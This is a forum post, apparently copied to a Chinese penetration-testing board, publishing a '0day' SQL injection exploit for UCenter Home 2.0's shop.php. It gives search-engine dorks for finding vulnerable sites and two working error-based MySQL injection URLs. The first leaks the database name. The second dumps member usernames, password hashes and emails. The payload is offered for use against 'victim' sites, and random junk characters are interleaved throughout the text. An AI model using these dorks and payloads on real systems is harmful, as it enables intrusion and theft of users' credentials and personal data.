中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]

作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
  O9 X4 F- C! {3 A- ]. d
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
% ?: U2 P2 t: C+ B9 {
) Z2 ~2 [7 _2 ~" m* V                                 
$ a- b6 X  o  j" z' V
1 q/ q3 n1 a7 ]0 u' b*/ Author : KnocKout  
2 T  h8 h* N6 |# u5 G/ S/ R/ d6 r: A  M7 G# g5 Q
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
4 S, ?# _2 A0 i- J4 J, \0 c4 H# \$ _( c
*/ Contact: knockoutr@msn.com  
5 \* W1 X' f9 U" n, b
. ]# ^& S: ^$ h# l" k4 @& f*/ Cyber-Warrior.org/CWKnocKout  
2 t- ?" o- g) j; J! {: p3 Z! L: Q1 k( F$ v" T
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  . I% h: V$ ]! o6 x
' E% u$ I" E: O& C# h! D( [# T
Script : UCenter Home  & S5 o7 C% W: S6 E1 `" ?- f' Z# T7 S

% P2 w9 m6 K* G' tVersion : 2.0  
+ d! [4 X4 O8 a; }9 X
1 U9 [( c# I1 v$ R; Z) JScript HomePage : http://u.discuz.net/  
3 J& k3 P# E: p& |# Y, f9 V8 N( E" ~
# R, Y- U1 z# i2 Z, p* m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  9 ?0 @/ _" n8 r4 y: `2 Q" t

" H2 R6 C8 J% y% P! e0 \' tDork : Powered by UCenter inurl:shop.php?ac=view  4 s0 }+ y. m1 ~$ \- f5 }
0 p' C$ U) s# p+ e5 G3 T3 o% Q
Dork 2 : inurl:shop.php?ac=view&shopid=  ' l' C2 f+ r; A: `

- g6 y( b6 }, v8 w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  3 G. N1 c& g8 {* A' S9 ?' }& f
8 c# m* e4 V$ x( j3 V1 X# P
Vuln file : Shop.php  
* ]: X+ C6 v, T8 I; B9 q' H0 i: O! X/ m: C5 r( ~
value's : (?)ac=view&shopid=  6 J6 N* R, @# {$ B

7 x% y( ]& f5 {) OVulnerable Style : SQL Injection (MySQL Error Based)  
; D) {% f6 |, |, s/ a
- s0 G) `1 F6 P# E+ r/ J. jNeed Metarials : Hex Conversion  
; W" t5 o! Z/ U/ l: q4 X0 p
. t) o4 h- U" k1 P* y5 h: Y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  4 R8 M7 `& R$ D0 P$ ~' w
" Y4 Q! w- I; Y- P
Your Need victim Database name.   3 l$ U5 C6 H; J4 q

0 k1 i0 B) J: _5 ^# Efor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
* H- z! h  q1 L2 _
: l# _/ h2 P4 ?- b2 {..  9 f) r' o% M- O% a5 N/ t

) ?) p  q8 p" j1 o, b5 sDB : Okey.  
5 |( W+ a: r4 j! G/ l
% _+ C) R2 |, f6 p5 P- F8 Uyour edit DB `[TARGET DB NAME]`  
9 G" I1 S% L. G2 e2 I
- d% o. e3 C' S% xExample : 'hiwir1_ucenter'  ' E0 J! k( }+ O) |9 I0 u
- M8 j2 O  U' g$ R1 Z1 @* c
Edit : Okey.  
0 G' S" ?' F8 c$ @# p4 h+ o4 \, K6 s1 I" F
Your use Hex conversion. And edit Your SQL Injection Exploit..  
9 k; n, B+ G" r9 s$ O+ T
1 Z8 ^6 z$ n: l0 H  E" W   " v- {" x* h; G+ e
8 y, {2 x# [! H# I% x
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  8 T3 a6 D, \: r4 n2 c





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2